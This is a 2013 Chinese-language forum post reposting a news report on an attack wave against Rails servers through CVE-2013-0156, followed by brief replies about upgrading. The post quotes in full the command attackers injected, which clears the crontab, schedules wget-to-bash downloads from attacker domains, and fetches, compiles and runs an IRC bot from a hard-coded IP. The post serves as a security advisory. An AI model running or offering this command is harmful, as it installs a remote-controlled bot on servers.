Rails Rails 框架遭受持续不断的攻击波

moneak · 2013年06月05日 · 最后由 Rei 回复于 2013年06月05日 · 2538 次阅读

在过去的几天里,攻击者已经越来越多地试图通过一个 Rails 框架的安全漏洞来攻陷服务器。成功的入侵者在服务器上安装一个机器人,使其等到来自 IRC 频道的进一步指示。

在安全专家 Jeff Jarmoc 的博客中写到,攻击者是通过 CVE 2013-0156 漏洞试图攻击的。尽管该漏洞已经在 1 月份时关闭,但还有相当多的服务器仍然运行过时的 Ruby 版本。Jarmoc 称攻击者尝试注入如下命令:

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k

这导致系统自动下载 bot (k.c) 编译然后执行,Jarmoc 在其博客上也公布了该机器人程序的源码。“k”尝试联系位于 cvv4you.ru 域的 IRC 服务器,然后加入 #rails 频道,在这里等待进一步的攻击指令。Jarmoc 称 k 程序可通过指令下载并执行任意代码。目前该 IRC 服务器已经能够不可用,至少现在的地址是不可用的。

该机器人程序在进程列表中显示为 "- bash" ,启动时会同时创建一个 /tmp/tan.pid 文件以确保同一时间只有一个进程实例运行。所有使用 Rails 框架的用户应该确认正在使用当前的 Rails 版本,当前可靠的版本包括:3.2.13, 3.1.12 and 2.3.18.

转自:http://www.h-online.com/open/news/item/Attack-wave-on-Ruby-on-Rails-1872588.html

难道至今还有 Rails 没有升级或是打补丁的?

那意思就是说。我现在使用的 Rails 3.2.6 有可能悲剧喔。

偶不在攻击范围之内

被攻击一次,框架强壮一次,Rails 越来越好

想起有个不怎么维护的项目还没升级,赶紧升了。

需要 登录 后方可回复, 如果你还没有账号请 注册新账号